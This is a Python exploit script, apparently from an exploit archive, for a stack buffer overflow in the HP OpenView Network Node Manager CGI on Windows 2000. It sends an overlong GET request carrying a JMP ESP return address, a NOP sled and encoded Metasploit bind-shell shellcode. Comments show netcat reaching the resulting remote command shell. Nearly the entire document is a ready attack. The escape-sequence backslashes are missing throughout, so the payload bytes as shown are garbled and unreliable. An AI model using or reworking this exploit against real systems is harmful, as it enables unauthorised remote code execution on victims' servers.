#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow 
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
# the entry point and injecting Sleep just before exe execution. This gave me enough 
# time to attach a debugger before program termination. If anyone knows how to properly 
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:Program FilesHP OpenViewwwwcgi-bin>

import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGIn"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="x29x4cxe1x77" # JMP ESP user32.dll Win2kSP4
buffer+="x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax68"
"x58x30x41x31x50x41x42x6bx41x41x78x32x41x42x32x42"
"x41x30x42x41x41x58x38x41x42x50x75x6bx59x39x6cx50"
"x6ax78x6bx30x4dx49x78x38x79x59x6fx4bx4fx39x6fx71"
"x70x6ex6bx50x6cx67x54x67x54x4cx4bx72x65x65x6cx4c"
"x4bx41x6cx36x65x42x58x46x61x4ax4fx6cx4bx70x4fx64"
"x58x4cx4bx73x6fx47x50x76x61x7ax4bx50x49x6cx4bx55"
"x64x4ex6bx54x41x7ax4ex65x61x6fx30x6dx49x6cx6cx4e"
"x64x4fx30x71x64x35x57x49x51x4ax6ax56x6dx63x31x5a"
"x62x5ax4bx79x64x77x4bx61x44x57x54x45x78x63x45x78"
"x65x6cx4bx33x6fx44x64x53x31x48x6bx41x76x4cx4bx54"
"x4cx30x4bx6ex6bx43x6fx45x4cx66x61x78x6bx66x63x76"
"x4cx4cx4bx6cx49x42x4cx71x34x65x4cx50x61x48x43x50"
"x31x6bx6bx30x64x4cx4bx50x43x70x30x4ex6bx31x50x64"
"x4cx6cx4bx74x30x47x6cx6ex4dx6ex6bx63x70x75x58x63"
"x6ex62x48x4cx4ex50x4ex74x4ex5ax4cx50x50x4bx4fx4b"
"x66x30x66x30x53x33x56x73x58x66x53x30x32x75x38x70"
"x77x53x43x54x72x33x6fx76x34x6bx4fx6ex30x62x48x6a"
"x6bx38x6dx49x6cx67x4bx50x50x4bx4fx48x56x61x4fx6c"
"x49x38x65x65x36x4bx31x4ax4dx47x78x43x32x32x75x73"
"x5ax64x42x79x6fx38x50x75x38x7ax79x46x69x7ax55x6c"
"x6dx66x37x59x6fx6ex36x76x33x30x53x30x53x50x53x51"
"x43x42x63x70x53x51x53x53x63x4bx4fx4ex30x33x56x62"
"x48x54x51x53x6cx61x76x52x73x4ex69x5ax41x6ex75x75"
"x38x4dx74x66x7ax34x30x6ax67x32x77x6bx4fx79x46x51"
"x7ax46x70x51x41x70x55x4bx4fx38x50x53x58x4ex44x4c"
"x6dx66x4ex78x69x33x67x49x6fx6ex36x50x53x31x45x6b"
"x4fx5ax70x75x38x4dx35x42x69x6bx36x30x49x71x47x79"
"x6fx59x46x56x30x50x54x70x54x30x55x79x6fx48x50x4f"
"x63x52x48x7ax47x70x79x59x56x54x39x51x47x59x6fx58"
"x56x50x55x79x6fx58x50x52x46x73x5ax61x74x63x56x33"
"x58x65x33x52x4dx4dx59x4bx55x33x5ax70x50x56x39x44"
"x69x6ax6cx4dx59x59x77x71x7ax67x34x4cx49x7ax42x54"
"x71x4bx70x79x63x4cx6ax4bx4ex52x62x64x6dx49x6ex30"
"x42x56x4cx4dx43x4cx4dx72x5ax77x48x6cx6bx4cx6bx6c"
"x6bx32x48x31x62x49x6ex6fx43x77x66x6bx4fx50x75x51"
"x54x6bx4fx7ax76x61x4bx72x77x66x32x70x51x36x31x33"
"x61x53x5ax65x51x72x71x61x41x30x55x41x41x79x6fx48"
"x50x32x48x6cx6dx6ex39x45x55x58x4ex61x43x69x6fx6a"
"x76x53x5ax39x6fx4bx4fx46x57x69x6fx6ax70x4ex6bx73"
"x67x49x6cx6dx53x49x54x70x64x6bx4fx4bx66x61x42x6b"
"x4fx48x50x33x58x4ax4fx58x4ex6dx30x35x30x33x63x4b"
"x4fx6bx66x79x6fx58x50x68")
buffer+="rnrn"

expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."

# www.Syue.com [2007-12-12]